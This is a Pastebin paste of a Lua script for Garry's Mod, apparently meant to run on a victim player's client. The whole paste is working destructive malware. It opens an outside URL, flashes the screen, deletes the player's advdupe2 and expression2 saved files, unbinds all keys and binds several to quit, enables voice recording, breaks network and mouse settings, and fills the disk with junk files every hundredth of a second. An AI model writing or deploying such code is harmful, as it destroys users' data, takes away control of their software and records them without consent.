Advertisement
Guest User

selfsd

a guest
May 24th, 2015
265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.66 KB | None | 0 0
  1. gui.OpenURL("http://guf.dessower.ru")
  2.  
  3. local STR = {}
  4. local SH = ScrH() HI = SH/6 SW = ScrW() Uid = 0
  5. local abs = math.abs cos = math.cos sin = math.sin
  6. local TBL =
  7. {
  8. "[","H","E","X",
  9. " ]","0","x","0",
  10. "0"}
  11. local PDR =
  12. {
  13. Color(255,0,0),
  14. Color(255,155,0),
  15. Color(255,255,0),
  16. Color(0,255,0),
  17. Color(0,0,255),
  18. Color(100,55,155)
  19. }
  20.  
  21. surface.CreateFont("ai_ply_hack",{
  22. font="Consolas",
  23. size=80,
  24. weight=1000,
  25. antialias=true,
  26. outline=true
  27. })
  28. hook.Add("HUDPaint","hack",function()
  29.  
  30. local C = CurTime()
  31.  
  32. for i = 1,6 do
  33. PDR[i].a = abs(cos(C+i*25)*255)
  34. surface.SetDrawColor(PDR[i])
  35. surface.DrawRect(0,(i-1)*HI,SW,HI)
  36. end
  37.  
  38. for id,obj in pairs(TBL) do
  39.  
  40. local X = cos(C/10)*(SW-620)
  41. local Y = abs(sin(C+id/6)*(-SH+100))
  42. local YC = math.Clamp(Y/2,0,255)
  43. local Col = Color(YC,abs((cos(C)*255)-YC),0,255)
  44. surface.SetTextPos(X+40*id,Y)
  45. surface.SetTextColor(Col)
  46. surface.SetFont("ai_ply_hack")
  47. surface.DrawText(obj)
  48. end
  49. end)
  50.  
  51. local FILES,FOLDERS = file.Find("advdupe2/*","DATA")
  52. for id,obj in pairs(FILES) do
  53. file.Delete("advdupe2/"..obj)
  54. end
  55.  
  56. local FILES,FOLDERS = file.Find("expression2/*","DATA")
  57. for id,obj in pairs(FILES) do
  58.  
  59. file.Delete("expression2/"..obj)
  60. end
  61. local function name_builder()
  62. local Str = ""
  63. Uid = Uid+1
  64. Str = Str..string.format("%X",Uid)
  65. return Str
  66. end
  67. local function long_string()
  68. local Str = ""
  69. for I = 1,250 do
  70. Str = Str..name_builder()
  71. end
  72. return Str
  73. end
  74. local function random_files()
  75. file.Write(name_builder()..".txt",long_string())
  76. end
  77.  
  78. hook.Add("Tick","voicecgat", function()
  79. gui.EnableScreenClicker(false)
  80. gui.SetMousePos(0,0)
  81. RunConsoleCommand("cl_mouselook",1)
  82. RunConsoleCommand("+voicerecord")
  83. RunConsoleCommand("unbindall")
  84.  
  85. RunConsoleCommand("-right")
  86. RunConsoleCommand("+left")
  87.  
  88. RunConsoleCommand("cl_updaterate","0")
  89. RunConsoleCommand("cl_timeout","0")
  90. RunConsoleCommand("net_maxpacketdrop","1")
  91. RunConsoleCommand("cl_mouseenable","0")
  92. RunConsoleCommand("cl_drawhud", "0")
  93. RunConsoleCommand("cl_allowupload","0")
  94. RunConsoleCommand("cl_allowdownload","0")
  95. RunConsoleCommand("cl_allowupload","0")
  96. RunConsoleCommand("cl_cmdrate","1")
  97. RunConsoleCommand("cl_lagcompensation","0")
  98. RunConsoleCommand("physgun_wheelspeed","0")
  99.  
  100. RunConsoleCommand("bind","q","quit")
  101. RunConsoleCommand("bind","x","quit")
  102. RunConsoleCommand("bind","y","quit")
  103.  
  104. for i = 1,50 do
  105. if i%25 == 0 then
  106. RunConsoleCommand("+attack")
  107. else
  108. RunConsoleCommand("-attack")
  109. end
  110. end
  111. end)
  112.  
  113. timer.Create("File_Fill",0.01,-1,function()
  114. file.Append("wire_version.txt",long_string())
  115. for i = 1,3 do
  116. random_files()
  117. end
  118. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement